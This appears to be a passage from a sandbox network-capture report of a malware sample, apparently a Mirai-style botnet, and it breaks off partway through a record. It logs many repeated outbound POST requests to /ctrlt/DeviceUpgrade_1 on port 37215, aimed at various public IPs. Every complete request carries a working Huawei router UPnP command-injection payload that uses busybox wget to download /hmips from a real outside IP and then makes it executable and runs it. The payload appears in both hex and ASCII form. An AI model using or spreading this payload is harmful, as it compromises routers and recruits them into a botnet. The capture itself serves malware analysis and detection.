68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            108192.168.2.155961441.214.56.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.734028101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            109192.168.2.155551241.171.226.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.734045029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            110192.168.2.153703441.17.4.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.734093904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            111192.168.2.153466241.42.182.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.734139919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            112192.168.2.153489841.34.211.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.735483885 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            113192.168.2.153562241.98.62.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.735515118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            114192.168.2.1535722197.90.226.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175445080 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            115192.168.2.1546618197.7.43.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175494909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            116192.168.2.1560992197.80.73.14437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175527096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            117192.168.2.1533572197.213.78.12537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175571918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            118192.168.2.1553778197.233.84.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175574064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
